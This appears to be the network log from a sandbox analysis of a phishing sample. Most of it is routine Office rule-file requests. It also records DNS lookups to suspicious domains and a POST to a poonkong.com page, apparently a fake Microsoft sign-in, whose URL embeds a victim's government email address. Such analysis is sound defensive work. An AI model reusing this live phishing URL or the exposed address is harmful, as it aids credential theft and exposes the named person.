Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: safetyworksolutions.com
Source: global trafficDNS traffic detected: DNS query: poonkong.com
Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
Source: unknownHTTP traffic detected: POST /o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov HTTP/1.1Host: poonkong.comConnection: keep-aliveContent-Length: 139177Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://poonkong.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.govAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 22:37:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: chromecache_43.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
Source: chromecache_43.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
Source: chromecache_45.2.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
Source: chromecache_43.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
Source: chromecache_43.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 55172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 55195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55281 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55197
Source: unknownNetwork traffic detected: HTTP traffic on port 55269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55194
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55190
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55192
Source: unknownNetwork traffic detected: HTTP traffic on port 55217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
